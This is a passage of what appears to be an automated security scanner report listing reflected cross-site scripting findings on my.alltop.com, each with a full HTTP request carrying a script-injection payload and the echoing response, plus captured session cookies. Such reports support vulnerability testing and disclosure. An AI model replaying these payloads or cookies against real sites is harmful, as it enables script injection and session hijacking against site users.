"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f1dffd"><script>alert(1)</script>494432b1804/%22ns=%22netsparker(0x0001AE)" method="post" accept-charset="utf-8">
...[SNIP]...

1.112. http://my.alltop.com/alpha/f/%22ns=%22netsparker(0x0001AE) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f/%22ns=%22netsparker(0x0001AE)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4bc"><script>alert(1)</script>59b63e2909c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f/%22ns6f4bc"><script>alert(1)</script>59b63e2909c=%22netsparker(0x0001AE) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:37 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:37 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:37 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f/%22ns6f4bc"><script>alert(1)</script>59b63e2909c=%22netsparker(0x0001AE)" method="post" accept-charset="utf-8">
...[SNIP]...

1.113. http://my.alltop.com/alpha/f/%22ns=%22netsparker(0x0001AE) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f/%22ns=%22netsparker(0x0001AE)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1575"><script>alert(1)</script>bb87551d7a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f/%22ns=%22netsparker(0x0001AE)?a1575"><script>alert(1)</script>bb87551d7a4=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:33 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:33 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:33 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f/%22ns=%22netsparker(0x0001AE)?a1575"><script>alert(1)</script>bb87551d7a4=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.114. http://my.alltop.com/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83254"><script>alert(1)</script>d65e63750bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f83254"><script>alert(1)</script>d65e63750bd/%2522ns%253D%2522netsparker%25280x0001B2%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:34 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:34 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:34 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f83254"><script>alert(1)</script>d65e63750bd/%2522ns%253D%2522netsparker%25280x0001B2%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.115. http://my.alltop.com/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b02e"><script>alert(1)</script>800b6acde3b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529)3b02e"><script>alert(1)</script>800b6acde3b HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:36 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:37 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:37 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529)3b02e"><script>alert(1)</script>800b6acde3b" method="post" accept-charset="utf-8">
...[SNIP]...

1.116. http://my.alltop.com/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4016"><script>alert(1)</script>723dd290d3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529)?e4016"><script>alert(1)</script>723dd290d3d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:32 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:32 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:32 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f/%2522ns%253D%2522netsparker%25280x0001B2%2529)?e4016"><script>alert(1)</script>723dd290d3d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.117. http://my.alltop.com/alpha/g ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g

Issue detail

The value of the '"--></style></script><script>netsparker(0x00019C)</script> request parameter is copied into the HTML document as plain text between tags. The payload eb774<script>alert(1)</script>9cbd873fd63 was submitted in the '"--></style></script><script>netsparker(0x00019C)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g?'"--></style></script><script>netsparker(0x00019C)</script>eb774<script>alert(1)</script>9cbd873fd63 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:26 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:27 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:27 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>eb774<script>alert(1)</script>9cbd873fd63" method="post" accept-charset="utf-8">
...[SNIP]...

1.118. http://my.alltop.com/alpha/g [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64976"><script>alert(1)</script>76975e56a68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g64976"><script>alert(1)</script>76975e56a68 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:02 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:03 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:03 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g64976"><script>alert(1)</script>76975e56a68" method="post" accept-charset="utf-8">
...[SNIP]...

1.119. http://my.alltop.com/alpha/g [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16cef"><script>alert(1)</script>404a76099af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g?16cef"><script>alert(1)</script>404a76099af=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:57 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:59 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:59 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/g?16cef"><script>alert(1)</script>404a76099af=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.120. http://my.alltop.com/alpha/g [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/g

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67394"><script>alert(1)</script>c90d49d4144 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/g?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00012C)%3C/script%3E67394"><script>alert(1)</script>c90d49d4144 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:01 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:01 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
